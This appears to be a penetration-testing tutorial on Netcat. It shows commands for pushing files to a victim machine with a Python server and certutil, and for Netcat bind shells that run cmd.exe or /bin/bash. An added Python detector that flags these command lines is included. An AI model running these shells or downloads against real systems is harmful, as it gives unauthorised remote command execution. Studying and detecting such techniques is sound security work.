🐚Bind & Reverse Shells
Netcat Fundamentals
Netcat (aka the TCP/IP Swiss Army Knife) is a networking utility used to read and write data to network connections using TCP or UDP.
Netcat is available for both *NIX and Windows operating systems, consequently making it extremely useful for cross-platform engagements.
Netcat utilizes a client-server communication architecture with two modes:
Client mode - Netcat can be used in client mode to connect to any TCP/UDP port as well as a Netcat listener (server).
Server mode - Netcat can be used to listen for connections from clients on a specific port.
Penetration testers can use Netcat for the following tasks:
Banner Grabbing
Port Scanning
Transferring Files
Bind/Reverse Shells
Usage of Netcat
The /usr/share/windows-binaries folder contains various Windows executables on Kali Linux. These files can be transferred to a victim's machine for exploitation.
Transferring Files from Kali Linux to Windows
Using Python HTTP Server and Certutil
Prepare Files:
Locate Windows executables in "/usr/share/windows-binaries" on Kali Linux.
Host File on Python Server:
Start a Python HTTP server:
python3 -m http.server
Files can now be accessed via http://<your_ip>:8000/<filename>.
Download on Windows Using Certutil:
On the victim's Windows machine:
certutil -urlcache -f http://<your_ip>:8000/<filename> <file_name_to_save>
Using Netcat (nc) for Direct Transfer
Setup Netcat on Windows:
Receive files using Netcat:
nc.exe -nvlp 1234 > <output-file-name>
Send File from Kali Linux:
Send file from Kali Linux to Windows:
nc -nv <win_ip> 1234 < <file-to-share>
Replace <win_ip> with the Windows machine's IP address.
Bind Shells
A bind shell is a type of remote shell where the attacker connects directly to a listener on the target system, consequently allowing for execution of commands on the target system.
A Netcat listener can be set up to execute a specific executable like cmd.exe or /bin/bash when a client connects to the listener.

Setting Up Bind Shells
Windows System
Establish Bind Shell:
nc.exe -nvlp 1234 -e cmd.exe
This command starts a Netcat listener (-l) on port 1234 (-p 1234) and executes (-e) cmd.exe upon connection, creating a bind shell.
Connect from Linux:
nc -nv <win_ip> <port>
Replace <win_ip> with the IP address of the Windows machine hosting the bind shell, and <port> with the port number (1234 in this example).
Linux System
Establish Bind Shell:
nc -nvlp 1234 -c /bin/bash
This command sets up a Netcat listener (-l) on port 1234 (-p 1234) and executes (-c) /bin/bash upon connection, creating a bind shell.
Connect from Windows:
nc.exe -nv <linux_ip> <port>
Replace <linux_ip> with the IP address of the Linux machine hosting the bind shell, and <port> with the port number (1234 in this example).
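Seen from the defender's side, the commands above leave recognizable process command lines. The following is an added example, not part of the original page, that flags the Netcat listener, the -e/-c bind shell and the certutil download in process-creation events. The "host<TAB>command line" event format, the host names, the labels and the function names are assumptions made for illustration.

```python
import re
import shlex

NC_NAMES = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat"}

def _base(path):  # lower-cased file name of a Windows or POSIX path
    return re.split(r"[\\/]", path.strip("\"'"))[-1].lower()

def classify(cmdline):
    """Return a finding label for one process command line, or None."""
    try:
        argv = shlex.split(cmdline, posix=False)  # keeps Windows backslashes intact
    except ValueError:                            # unbalanced quotes in the log
        argv = cmdline.split()
    if not argv:
        return None
    exe, args = _base(argv[0]), argv[1:]
    if exe in ("certutil", "certutil.exe"):
        low = [a.lower() for a in args]
        has_url = any(a.startswith(("http://", "https://")) for a in low)
        return "certutil-url-download" if "-urlcache" in low and has_url else None
    if exe not in NC_NAMES:
        return None
    listen, program = False, None
    for i, tok in enumerate(args):
        if not tok.startswith("-") or tok.startswith("--"):
            continue
        flags = tok[1:]                 # short flags may be clustered: -nvlp
        listen = listen or "l" in flags
        # Assumption: -e/-c name a program to run, as on the page (builds differ on -c).
        if ("e" in flags or "c" in flags) and i + 1 < len(args):
            program = args[i + 1]
    if program:
        return "netcat-bind-shell" if listen else "netcat-exec"
    return "netcat-listener" if listen else None

# Constructed sample events: "host<TAB>command line" (not real telemetry).
SAMPLE_EVENTS = [
    "WS01\tC:\\Tools\\nc.exe -nvlp 1234 -e cmd.exe",
    "web02\tnc -nvlp 1234 -c /bin/bash",
    "WS01\tcertutil -urlcache -f http://192.0.2.10:8000/tool.exe tool.exe",
    "WS01\tnc.exe -nvlp 1234",
]

def scan(events):
    """Return (host, label) for every flagged "host<TAB>cmdline" event."""
    pairs = ((h, classify(c)) for h, _, c in (e.partition("\t") for e in events))
    return [(h, label) for h, label in pairs if label]
```

Matching on the executable name alone misses renamed binaries, so in practice this kind of rule is paired with network telemetry for unexpected listening ports.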
Reverse Shells
A reverse shell is a type of remote shell where the target connects directly to a listener on the attacker’s system, consequently allowing for execution of commands on the target system.

Reverse Shell Cheatsheet
Hacker's Mantra:
Humiliation is the favorite currency of the hacker. - Sherlock Holmes